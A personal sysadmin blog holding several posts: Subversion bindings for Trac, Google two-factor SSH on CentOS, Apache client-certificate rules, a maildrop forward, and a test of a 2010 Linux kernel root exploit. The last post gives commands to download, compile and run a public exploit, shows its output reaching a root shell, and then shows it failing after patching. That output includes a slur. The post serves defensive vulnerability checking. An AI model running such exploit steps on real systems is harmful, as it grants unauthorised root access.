Just my Blog - Work

How to update Python bindings to subversion.

nospam@example.com (Pieter de Rijk) — Wed, 13 Jul 2011 20:33:52 +0200

Recently I run into the problem that a team had a requirement for subversion 1.6.6 (while CentOS 5u3 was not supporting this... but the vendor didn't provide a newer release). This team also had a requirement to have TRAC... TRAC is depended on Python... but I was not allowed to update the subversion bindings for python by updating the it on the whole system... so... this is what I did:

Installed a number of devel packages:

   # yum install apr-devel neon{,-devel} apr-util-devel

Compiled sqlite version 3.6.13 and installed it on NFS:

  $ ./configure --prefix=/nfs/apps/webservices/trac-parent/sqlite/3.6.13

  ...

  $ make ; make install

  ...

Compiled subversion 1.6.6 and installed it on NFS:

$ make clean; ./configure \

 --prefix=/nfs/apps/webservices/trac-parent/subversion/1.6.6 \

 --with-sqlite=/nfs/apps/webservices/trac-parent/sqlite/3.6.13 \

 --without-neon 

...

$ make -j8 ; make install ; make swig-py ; make install-swig-py

…

Added the following line to /etc/sysconfig/httpd:

export LD_LIBRARY_PATH=/nfs/apps/webservices/trac-parent/sqlite/3.6.13/lib/

Modified /etc/httpd/conf.d/trac.conf by adding a ‘PythonPath’ to the location-directive:

<Location /projects>

  ...

  PythonPath "['/nfs/apps/webservices/trac-parent/subversion/1.6.6/lib/svn-python'] + sys.path"

</Location>

Restart the trac daemon:

# service httpd stop

# service httpd start

Now you’ve to resync the trac-instance with Subversion (the
repository_dir value in the trac.ini of the instance).. but make sure
you use the correct bindings in Python:

# export LD_LIBRARY_PATH=/nfs/apps/webservices/trac-parent/sqlite/3.6.13/lib/

# export PYTHONPATH=/nfs/apps/webservices/trac-parent/subversion/1.6.6/lib/svn-python

# trac-admin ${TRAC_INSTANCE_PATH} repository resync "*"

CentOS 5 enabling Two-factor SSH authentication via Google

nospam@example.com (Pieter de Rijk) — Tue, 21 Jun 2011 14:16:57 +0200

Today I noticed a very nice article about enabling Google's two-factor authentication for Linux SSH.

After reading it... I found some time to play with it... so I enabled it within 10 minutes on my CentOS 5 64bit play-ground server... but there are some small 'caveats'.

hg - Command

To checkout the code, you must make install the mercurial RPM... this one is available via the EPEL repositories.

So after having the EPEL repositories enabled, run as root:

yum -y install mercurial

Compiling the PAM module

When you checked out the code.

hg clone https://google-authenticator.googlecode.com/hg/ google-authenticator/

You cannot compile directly the module... therefor you must apply a small change to the Makefile.

Change where /usr/lib/libdl.so is stated to /usr/lib64/libdl.so (3 occurrences)

$ make
$ sudo make install

Now you've to update the /etc/pam.d/sshd so it contains:

#%PAM-1.0
auth       required     pam_google_authenticator.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
session    optional     pam_keyinit.so force revoke
session    include      system-auth
session    required     pam_loginuid.so

Configure SSH

You also have to make sure that in /etc/ssh/sshd_config the following settings are set on yes:

ChallengeResponseAuthentication yes
UsePAM yes

And restart the SSH-daemon

Set up your smartphone/credentials on the system

$ google-authenticator
https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB
Your new secret key is: SAEP64T5VZAVWAFB
Your verification code is 376046
Your emergency scratch codes are:
67868696
26247332
54815527
54336661
71083816
Do you want me to update your "~/.google_authenticator" file (y/n) y
Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y
By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n) n
If the computer that you are logging into isn't hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n) y

And you're done

Give it a try to SSH to that box...

TIP: Make sure you've an SSH session still open... or you might lock yourself out of the system...

Require client-SSL certificate for certain content.

nospam@example.com (Pieter de Rijk) — Wed, 20 May 2009 15:53:13 +0200

On a kind of "intranet" website, which is secured with username/password combinations and HTTPS I've implemented the next feature:

- Authorized users can read everything on the website

- Files with in their filename "classified" requires a valid SSL-Client certificate...

Here is the output of my apache config:

<Directory /usr/sites/ssl-site/intranet/htdocs>
Options Indexes MultiViews
AllowOverride Authconfig
Order allow,deny
Allow from all
AuthName "intranet"
AuthType "Basic"
AuthUserFile /usr/sites/ssl-site/intranet/etc/users.pwl
require valid-user
</Directory>

<LocationMatch .*(c|C)(l|L)(a|A)(s|S)(s|S)(i|I)(f|F)(i|I)(e|E)(d|D).+>
SSLVerifyClient require
SSLVerifyDepth 1
SSLOptions +OptRenegotiate
</LocationMatch>

I still have to sort out some issues, like directories having a directory with the name "classified" in them.

Use maildrop to forward a mail to another mail box

nospam@example.com (Pieter de Rijk) — Thu, 11 Nov 2010 14:20:54 +0100

I recently had the need to forward e-mail based on the from field to another mailbox. I know, it's possible with a simple .forward in your $HOME, but that will forward all the mail.

So after some further searching I end up with the following rule for your maildrop filter... it simply checks if the mail (in this example) is from linus@mail.example.com and will forward it to linuxbox@collector.example.com:

if ( /^From: .*linus@mail\.example\.com.*/ )
{
        dotlock "forward.lock" {
          log "Forward mail"
          to "|/usr/sbin/sendmail linuxbox@collector.example.com"
        }
}

And that's all you need to put add to your $HOME/.mailfilter

The Linux Kernel exploit - become root by running 32bit code on a 64bit machine

nospam@example.com (Pieter de Rijk) — Wed, 13 Oct 2010 08:30:14 +0200

A lot of discussion is about one of the last kernel exploits... the one that you can become root using 32bit code on a 64bit machine. So I wanted to know if I'm vulnerable as well... just wanted to know how it works

So I simply did (as normal user) on a vulnerable version of the Linux kernel on CentOS 5.5:

$ mkdir /tmp/expl
$ wget -O /tmp/expl/expl.c http://www.seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin
$ gcc -m32 -o /tmp/expl/expl.exe /tmp/expl/expl.c

Now run the binary:

[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.7.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# whoami
root
sh-3.2#

Well... I don't like that... so... update the kernel, reboot and check again!

[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.17.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
[pieter@testbox ~]$